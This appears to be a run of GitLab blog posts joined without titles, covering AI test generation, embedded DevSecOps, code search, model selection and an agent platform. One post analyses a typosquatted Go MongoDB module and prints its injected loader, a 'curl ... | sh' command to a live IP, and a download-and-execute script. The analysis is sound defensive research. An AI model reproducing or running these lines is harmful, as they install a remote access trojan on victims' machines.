Here's where GitLab Duo with Amazon Q can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.

How GitLab Duo with Amazon Q works

So how does this work? Let's walk through the process together. When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the "Changes" tab to see the new code you've added.

Next, you invoke Amazon Q by entering a quick action command. All you need to do is type /q test in the issue comment box. It's that simple – just a forward slash, the letter "q", and the word "test".

Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.

Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.

Why use GitLab Duo with Amazon Q?

Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.

Key benefits of this feature:

• Significantly reduces time spent writing unit tests
• Ensures comprehensive test coverage across your codebase
• Maintains consistent testing quality across all team members
• Catches issues before they reach production
• Accelerates your overall development velocity

Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:

<!-- blank line -->

<figure class="video_container"> <iframe src="https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Get started with GitLab Duo with Amazon Q today

Want to learn more about GitLab Duo with Amazon Q? Visit the GitLab and AWS partner page for detailed information.

Agentic AI resources

• Agentic AI guides and resources
• What is agentic AI?
• GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available
• GitLab Duo with Amazon Q documentation

What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.

Convergence of market forces

Three powerful market forces are converging to compel embedded teams to modernize their development practices.

1. The software-defined product revolution

Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to $1.24 trillion by 2030, a massive 34% compound annual growth rate. The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain 650 million lines of code. Traditional embedded development approaches cannot handle this level of software complexity.

2. Hardware virtualization as a technical enabler

Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.

These virtualization technologies provide a foundation for continuous integration (CI). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.

3. The competitive and economic reality

Three interrelated forces are reshaping the competitive landscape for embedded development:

• The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.
• This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, SpaceX performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.
• The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.

Organizations are adopting embedded DevSecOps to help combat these challenges.

Priority transformation areas

Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.

From hardware bottlenecks to continuous testing

Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral. Addressing this challenge requires a multifaceted approach including:

• Automating the orchestration of expensive shared hardware test benches among embedded developers
• Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines
• Standardizing builds with version-controlled environments

Embedded developers can accomplish this with GitLab's On-Premises Device Cloud, a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.

Automating compliance and security governance

Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable. Leading organizations are transforming how they comply with these requirements by:

• Replacing manual workflows with automated compliance frameworks
• Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines
• Automating approval workflows, enforcing code reviews, and maintaining audit trails
• Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C

This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.

Enabling collaborative innovation

Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows. As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: "It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible." This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.

The window of opportunity

Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen. Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.

While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: 4 ways to accelerate embedded development with GitLab.

To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:

• Automated typosquatting detection, which identifies suspicious naming patterns
• Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions
• AI-assisted initial screening for advanced payload and obfuscation detection

This multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.

Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.

Executive summary: A MongoDB module that's not quite right

Our detection system flagged a newly published Go module called github.com/qiniiu/qmgo, closely mimicking the popular MongoDB module github.com/qiniu/qmgo. The legitimate module describes itself as "The Go driver for MongoDB" and has gained traction in the Go community.

To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (qiniu → qiniiu). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.

The new module’s code was a working copy of the legitimate qmgo module. However, malicious code was inserted into the NewClient function in client.go, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.

After reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (github.com/qiiniu/qmgo) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.

Technical deep dive: Peeling back the layers

The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:

txt, err := script.Get("https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html").String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, "\n", "", -1))).String()  
    if err == nil {  
        exec.Command("/bin/sh", "-c", string(txt2)).Start()  
    }  
}  

The attack unfolds in four distinct layers:

Layer 1: The code fetches update.html from another repository owned by the typosquat account qiiniu/vue-element-admin. The file contained a single line:

https://img.googlex.cloud/seed.php

Layer 2: The code then fetches https://img.googlex.cloud/seed.php, which returns a single shell command, which is executed:

curl -s http://207.148.110.29:80/logon61.gif|sh

Layer 3: The command tells the system to fetch http://207.148.110.29:80/logon61.gif using curl and execute the response as a shell script. The shell script downloads what appears to be an MP3 file (chainelli.mp3) to /tmp/vod, makes it executable, runs it, and immediately deletes it:

#!/bin/sh  
rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  

Layer 4: The chainelli.mp3 file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at ellipal.spoolsv.cyou on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:

• Complete remote shell access and one-off command execution
• Screenshot captures
• SOCKS proxy functionality to make connections through the compromised machine
• Configurable sleep interval between check-ins with the command and control server to avoid detection
• Standard remote access trojan features like filesystem browsing and upload/download

They're back (already)

Just four days after GitLab reported the initial malicious module and saw it removed, github.com/qiiniu/qmgo appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.

GitLab’s approach: Finding needles in haystacks

The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:

Typosquatting detection: GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.

Semantic heuristics: Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.

AI-assisted analysis: A large language model does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.

Human review: A human receives an alert to verify the finding and to perform advanced analysis.

Recommendations: Staying ahead of persistent supply chain threats

This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.

The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.

We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.

Indicators of compromise

How GitLab helps secure the software supply chain

Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes Application Security Testing scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.

Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.

Timeline

• 2025-06-01T09:31: GitLab reports github.com/qiniiu/qmgo to Go Security
• 2025-06-01T09:43: GitLab reports github.com/qiniiu/qmgo to GitHub
• 2025-06-01T10:14: GitLab reports ellipal.spoolsv.cyou (188.166.213.194) to the IP block owner
• 2025-06-02T04:03: Go Security takes down github.com/qiniiu/qmgo
• 2025-06-02T09:57: The IP block owner suspends 188.166.213.194
• 2025-06-03T09:15: GitHub suspends github.com/qiniiu
• 2025-06-05T17:15: GitLab reports github.com/qiiniu/qmgo to Go Security
• 2025-06-05T17:33: GitLab reports github.com/qiiniu/qmgo to GitHub
• 2025-06-05T17:45: Go Security takes down github.com/qiiniu/qmgo
• 2025-06-06T12:25: GitHub suspends github.com/qiiniu

Why traditional code search is challenging

Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.

These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.

GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After evaluating numerous options, we developed a better solution.

Introducing Exact Code Search: Three game-changing capabilities

Enter GitLab's Exact Code Search, currently in beta testing and powered by Zoekt (pronounced "zookt", Dutch for "search"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.

This feature revolutionizes how you find and understand code with three key capabilities:

1. Exact Match mode: Zero false positives

When toggled to Exact Match mode, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:

• Searching for specific error messages
• Looking for particular function signatures
• Finding instances of specific variable names

2. Regular Expression mode: Powerful pattern matching

For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:

• Find functions following specific naming patterns
• Locate variables matching certain constraints
• Identify potential security vulnerabilities using pattern matching

3. Multiple-line matches: See code in context

Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.

From features to workflows: Real-world use cases and impact

Let's see how these capabilities translate to real productivity gains in everyday development scenarios:

Debugging: From error message to root cause in seconds

Before Exact Code Search: Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.

With Exact Code Search:

1. Copy the exact error message
2. Paste it into Exact Code Search with Exact Match mode
3. Instantly find the precise location where the error is thrown, with surrounding context

Impact: Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.

Code exploration: Master unfamiliar codebases quickly

Before Exact Code Search: Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.

With Exact Code Search:

• Search for key methods or classes with Exact Match mode
• Review multiple line matches to understand implementation details
• Use Regular Expression mode to find similar patterns across the codebase

Impact: Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.

Refactoring with confidence

Before Exact Code Search: Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.

With Exact Code Search:

• Use Exact Match mode to find all occurrences of methods or variables
• Review context to understand usage patterns
• Plan your refactoring with complete information about impact

Impact: Eliminate the "missed instance" bugs that often plague refactoring efforts, improving code quality and reducing rework.

Security auditing: Finding vulnerable patterns

Security teams can:

• Create regex patterns matching known vulnerable code
• Search across all repositories in a namespace
• Quickly identify potential security issues with context that helps assess risk

Impact: Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.

Cross-repository insights

Search across your entire namespace or instance to:

• Identify similar implementations across different projects
• Discover opportunities for shared libraries or standardization

Impact: Break down silos between projects and identify opportunities for code reuse and standardization.

The technical foundation: How Zoekt delivers speed and precision

Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.

Positional trigrams: The secret to lightning-fast exact matches

Zoekt's speed comes from its use of positional trigrams — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.

Here's how it works:

Traditional full-text search engines like Elasticsearch tokenize code into words and lose positional information. When you search for getUserId(), they might return results containing user, get, and Id scattered throughout a file — leading to those frustrating false positives for GitLab users.

Zoekt's positional trigrams maintain exact character sequences and their positions. When you search for getUserId(), Zoekt looks for the exact trigrams like get, etU, tUs, Use, ser, erI, rId, Id(", "d(), all in the correct sequence and position. This ensures that only exact matches are returned.

The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was one of our most requested features for good reason - developers were losing significant time sifting through false positives.

Regular expression performance at scale

Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.

Built for enterprise scale

Exact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.

Handling terabytes of code with ease

On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over 48 TB of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.

Self-registering node architecture

Our innovative implementation features:

• Automatic node registration: Zoekt nodes register themselves with GitLab
• Dynamic shard assignment: The system automatically assigns namespaces to nodes
• Health monitoring: Nodes that don't check in are automatically marked offline

This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.

Distributed system with intelligent load balancing

Behind the scenes, Exact Code Search operates as a distributed system with these key components:

• Specialized search nodes: Purpose-built servers that handle indexing and searching
• Smart sharding: Code is distributed across nodes based on namespaces
• Automatic load balancing: The system intelligently distributes work based on capacity
• High availability: Multiple replicas ensure continuous operation even if nodes fail

Note: High availability is built into the architecture but not yet fully enabled. See Issue 514736 for updates.

Seamless security integration

Exact Code Search automatically integrates with GitLab's permission system:

• Search results are filtered based on the user's access rights
• Only code from projects the user has access to is displayed
• Security is built into the core architecture, not added as an afterthought

Optimized performance

• Efficient indexing: Large repositories are indexed in tens of seconds
• Fast query execution: Most searches return results with sub-second response times
• Streaming results: The new gRPC-based federated search streams results as they're found
• Early termination: Once enough results are collected, the system pauses searching

From library to distributed system: Engineering challenges we solved

While Zoekt provided the core search technology, it was originally designed as a minimal library for managing .zoekt index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale"

Challenge 1: Building a orchestration layer

The problem: Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.

Our solution: We built a comprehensive orchestration layer that:

• Creates and manages database models to track nodes, indices, repositories, and tasks
• Implements a self-registering node architecture (inspired by GitLab Runner)
• Handles automatic shard assignment and load balancing across nodes
• Provides bidirectional API communication between GitLab Rails and Zoekt nodes

Challenge 2: Scaling storage and indexing

The problem: How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?

Our solution: We implemented:

• Intelligent sharding: Namespaces are distributed across nodes based on capacity and load
• Independent replication: Each node independently indexes from Gitaly (our Git storage service), eliminating complex synchronization
• Watermark management: Sophisticated storage allocation that prevents nodes from running out of space
• Unified binary architecture: A single gitlab-zoekt binary that can operate in both indexer and webserver modes

Challenge 3: Permission Integration

The problem: Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.

Our solution: We built native permission filtering directly into the search flow:

• Search requests include user permission context
• Results are filtered to include only those the user can access in case permissions change before indexing completes

Challenge 4: Operational simplicity

The problem: Managing a distributed search system shouldn't require a dedicated team.

Our solution:

• Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work
• Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed
• Zero-configuration sharding: The system automatically determines optimal shard assignments

Gradual rollout: Minimizing risk at scale

Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:

Phase 1: Controlled testing (gitlab-org group)

We started by enabling Exact Code Search only for the gitlab-org group - our own internal repositories. This allowed us to:

• Test the system with real production workloads
• Identify and fix performance bottlenecks
• Streamline the deployment process
• Learn from real users' workflows and feedback

Phase 2: Performance validation and optimization

Before expanding, we focused on ensuring the system could handle GitLab.com's scale:

• Implemented comprehensive monitoring and alerting
• Validated storage management with real production data growth

Phase 3: Incremental customer expansion

We gradually expanded to customers interested in testing Exact Code Search:

• Gathered feedback on performance and user experience
• Refined the search UI based on real user workflows
• Optimized indexing performance (large repositories like gitlab-org/gitlab now index in ~10 seconds)
• Refined the architecture based on operational learnings
• Massively increased indexing throughput and improved state transition livecycle

Phase 4: Broad rollout

Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:

• Toggle between regex and exact search modes
• Experience the benefits without any configuration changes
• Fall back to the previous search if needed (though few choose to)

Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.

For technical deep dive: Interested in the detailed architecture and implementation? Check out our comprehensive design document for in-depth technical details about how we built this distributed search system.

Getting started with Exact Code Search

Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).

Quickstart guide

1. Navigate to the Advanced Search in your GitLab project or group
2. Enter your search term in the code tab
3. Toggle between Exact Match and Regular Expression modes
4. Use filters to refine your search

Basic search syntax

Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:

Pro Tip: For the most efficient searches, start specific and then broaden if needed. Using file: and lang: filters dramatically increases relevance.

Advanced search techniques

Stack multiple filters for precision:

is_expected file:rb -file:spec

This finds "is_expected" in Ruby files that don't have "spec" in their name.

Use regular expressions for powerful patterns:

token.*=.*[\"']

Watch this search performed against the GitLab Zoekt repository.

The search helps find hardcoded passwords, which, if not found, can be a security issue.

For more detailed syntax information, check the Exact Code Search documentation.

Availability and deployment

Current availability

Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:

• Available for over 99% of licensed groups
• Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag

Self-managed deployment options

For self-managed instances, we offer several deployment methods:

• Kubernetes/Helm: Our most well-supported method, using our gitlab-zoekt Helm chart
• Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods

System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.

What's coming next

While Exact Code Search is already powerful, we're continuously improving it:

• Scale optimizations to support instances with hundreds of thousands of repositories
• Improved self-managed deployment options, including streamlined Omnibus support
• Full high availability support with automatic failover and load balancing

Stay tuned for updates as we move from Beta to General Availability.

Transform how you work with code

GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:

• No more wasting time with irrelevant results
• No more missing important matches
• No more clicking through files just to understand basic context
• No more performance issues as codebases grow

The impact extends beyond individual productivity:

• Teams collaborate better with easy code referencing
• Knowledge sharing accelerates when patterns are discoverable
• Onboarding becomes faster with quick codebase comprehension
• Security improves with effective pattern auditing
• Technical debt reduction becomes more feasible

Exact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.

We'd love to hear from you! Share your experiences, questions, or feedback about Exact Code Search in our feedback issue. Your input helps us prioritize improvements and new features.

Ready to experience smarter code search? Learn more in our documentation or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try a free, 60-day trial of GitLab Ultimate with Duo!

Meet GitLab Duo Model Selection, a powerful new capability that gives teams control over the large language models (LLMs) used in your organization. Available in private beta in the newly released GitLab 18.1 to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.

The benefits of GitLab Duo Model Selection

Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features, though those without specialized requirements are recommended to use the GitLab default model. With Duo Model Selection, you can:

• Configure models at the organization level: Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.

• Control models per GitLab Duo feature: Different GitLab Duo features can use different models based on your specific needs.

Watch Duo Model Selection in action:

<div style="padding:62.21% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1094452473?autoplay=1"badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Duo Model Selection Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Join the Duo Model Selection private beta

Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, sign up for a GitLab Duo trial today!

Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our on-demand launch event.

Imagine starting your day like this:

• You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.
• In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.
• Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.
• Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.

All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.

This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks. That’s the future we’re building with GitLab Duo Agent Platform.

What is GitLab Duo Agent Platform?

GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and AI agents across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.

Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.

GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:

• Issue implementation
• Large-scale migrations/dependency upgrades
• Automated documentation building/release posts
• Fixing broken pipelines
• Incident research support
• Deep research of status and information on topics
• Backlog administration
• Vulnerability resolution
• Reviews for specific types of code (e.g. database)
• Quick internal tool building based on existing build blocks
• and many more!

You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.

Watch GitLab Duo Agent Platform in action: <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1095679084?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Agent Platform Demo Clip"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Choose your tools, your models, and your agents

Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.

The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.

GitLab Duo Agent Platform will work with any approved language model that meets our selection criteria. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.

Context is everything, and your GitLab Duo agents have it

The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.

Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.

Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.

Stay in control while agents scale your team

Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.

That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.

Built for community and customization

GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.

GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.

This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our CI/CD Catalog. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.

How to get started

If you've been experimenting with GitLab Duo Agentic Chat, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.

To see what GitLab Duo Agent Platform can do and what we’re working on, check out the demos in the recording of our annual GitLab 18 release event.

Want to be among the first to experience it? Sign up for the GitLab Duo Agent Platform beta waitlist. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.

Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.

Learn more

• From vibe coding to agentic AI: A roadmap for technical leaders
• What is agentic AI?
• DevOps automation and AI agents
• AI-augmented software development: Agentic AI for DevOps
